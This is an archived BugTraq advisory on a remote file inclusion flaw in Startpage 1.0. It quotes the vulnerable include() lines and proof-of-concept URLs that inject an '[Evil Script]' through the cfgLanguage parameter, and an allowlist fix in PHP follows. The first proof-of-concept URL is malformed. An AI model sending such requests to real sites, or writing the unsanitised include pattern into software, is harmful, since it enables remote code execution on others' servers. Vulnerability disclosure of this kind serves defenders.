BugTraq
Startpage <= 1.0 (cfgLanguage) Remote File Inclusion Vulnerability
Aug 10 2006 08:53PM
sh3ll sh3ll ir
--------------------------------------------------------------------------------------------
Startpage 1.0 cfgLanguage Remote File Inclusion
--------------------------------------------------------------------------------------------
Author : Sh3ll
Date : 2006/08/10
HomePage : http://www.sh3ll.ir
Contact : sh3ll[at]sh3ll[dot]ir
--------------------------------------------------------------------------------------------
Affected Software Description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Startpage
Version : 1.0
Vendor : http://matthijs.draijer.org
Class : Remote File Inclusion
Risk : High
Summary :
Startpage v1.0 Is a Script Which Shows Your Favorite Links.
--------------------------------------------------------------------------------------------
Vulnerability:
~~~~~~~~~~~~~
The Problem Exists in edit.php, functions.php, new.php, PageBottom.php & PageTop.php
When the Variable $cfgLanguage Is Used in an include() Function Without Being Declared.
----------------------------------------edit.php--------------------------------------------
...
<?php
include ("language_$cfgLanguage.php");
?>
...
----------------------------------------functions.php---------------------------------------
...
<?php
include ("config.php");
include ("language_$cfgLanguage.php");
?>
...
----------------------------------------new.php---------------------------------------------
...
<?php
include ("config.php");
include ("functions.php");
include ("PageTop.php");
include ("language_$cfgLanguage.php");
connect_db();
?>
...
----------------------------------------PageBottom.php--------------------------------------
...
<?php
include ("config.php");
include ("language_$cfgLanguage.php");
?>
...
----------------------------------------PageTop.php-----------------------------------------
...
<?php
include ("config.php");
include ("language_$cfgLanguage.php");
?>
...
--------------------------------------------------------------------------------------------
PoC:
~~~
http://www.target.com/[Startpage]/edit.php?=[Evil Script]
http://www.target.com/[Startpage]/functions.php?cfgLanguage=[Evil Script]
http://www.target.com/[Startpage]/new.php?cfgLanguage=[Evil Script]
http://www.target.com/[Startpage]/PageBottom.php?cfgLanguage=[Evil Script]
http://www.target.com/[Startpage]/PageTop.php?cfgLanguage=[Evil Script]
Solution:
~~~~~~~~
Sanitize Variable $cfgLanguage in edit.php, functions.php, new.php, PageBottom.php & PageTop.php
--------------------------------------------------------------------------------------------
Note:
~~~~
Vendor Contacted, But No Response. So Do a Dirty Patch.
--------------------------------------------------------------------------------------------
Shoutz:
~~~~~~
~ Special Greetz To My Best Friend N4sh3n4s & My GF Atena
~ To All My Friends in Xmors - Aria - Hackerz & Other Iranian Cyber Teams
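One way to apply the "Sanitize" advice in the post above, as an added example that is not part of the original post or of Startpage's own code: the requested language is checked against a fixed allowlist before the include path is built. The function name, the language codes, the fallback and the temporary directory are assumptions made for illustration.

```php
<?php
// Added example, not Startpage code. resolve_language_file(), the language
// codes and the 'en' fallback are hypothetical names chosen for illustration.

/**
 * Map a requested language code to a language file that is known to exist.
 * Only codes in the fixed allowlist are accepted; anything else falls back.
 */
function resolve_language_file($requested, $baseDir, $fallback = 'en')
{
    $allowed = array('en', 'nl', 'de');   // constructed list of shipped languages

    // Reject non-strings (e.g. cfgLanguage[]=x) and any value not in the list.
    // The strict flag avoids PHP's loose-comparison matches.
    if (!is_string($requested) || !in_array($requested, $allowed, true)) {
        $requested = $fallback;
    }

    // The path is built only from a fixed directory and an allowlisted code,
    // so no URL scheme or "../" sequence from the request can reach include().
    $path = $baseDir . '/language_' . $requested . '.php';

    if (!is_file($path)) {
        throw new RuntimeException('Missing language file for ' . $requested);
    }
    return $path;
}

// Demo with constructed inputs; a temp directory stands in for the script directory.
$dir = sys_get_temp_dir() . '/startpage_demo';
if (!is_dir($dir)) {
    mkdir($dir);
}
foreach (array('en', 'nl', 'de') as $code) {
    file_put_contents("$dir/language_$code.php", "<?php // strings for $code\n");
}

// One valid code, then three constructed hostile-looking values.
$samples = array('nl', 'http://example.invalid/x?', '../../etc/passwd', array('x'));
foreach ($samples as $input) {
    $file = resolve_language_file($input, $dir);
    echo json_encode($input), ' => ', basename($file), "\n";
    include $file;   // $file can only be one of three fixed names
}
```

Each of the five scripts listed in the post would call the resolver instead of interpolating `$cfgLanguage` directly, with `$cfgLanguage` assigned in `config.php` before any `include`.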
Re: Startpage <= 1.0 (cfgLanguage) Remote File Inclusion Vulnerability
Aug 13 2006 12:31PM
Carsten Eilers (ceilers-lists gmx de)